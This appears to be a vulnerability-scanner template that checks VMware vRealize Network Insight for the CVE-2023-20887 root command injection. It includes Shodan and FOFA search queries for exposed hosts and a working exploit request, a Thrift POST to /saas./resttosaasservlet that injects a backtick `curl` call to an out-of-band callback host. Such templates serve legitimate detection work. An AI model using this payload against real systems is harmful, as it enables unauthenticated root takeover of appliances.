id: CVE-2023-20887

info:
  name: VMware VRealize Network Insight - Remote Code Execution
  author: sinsinology
  severity: critical
  verified: true
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are
     vulnerable.
    shodan-query: title:"VMware vRealize Network Insight"
    fofa-query: title="VMware vRealize Network Insight"
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2023-0012.html
    - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
    - https://github.com/sinsinology/CVE-2023-20887
    - https://www.vmware.com/security/advisories/VMSA-2023-0012.html
  tags: cve,cve2023,vmware,rce,msf,vrealize,insight,oast
  created: 2023/06/16

set:
  reverse: newReverse()
  reverseURL: reverse.url.host
rules:
  r0:
    request:
      method: POST
      path: /saas./resttosaasservlet
      headers:
        Content-Type: application/x-thrift
      body: |
        [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl {{reverseURL}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'{"rec":') &&
      response.headers["content-type"].contains('application/x-thrift') &&
      reverse.wait(5)
expression: r0()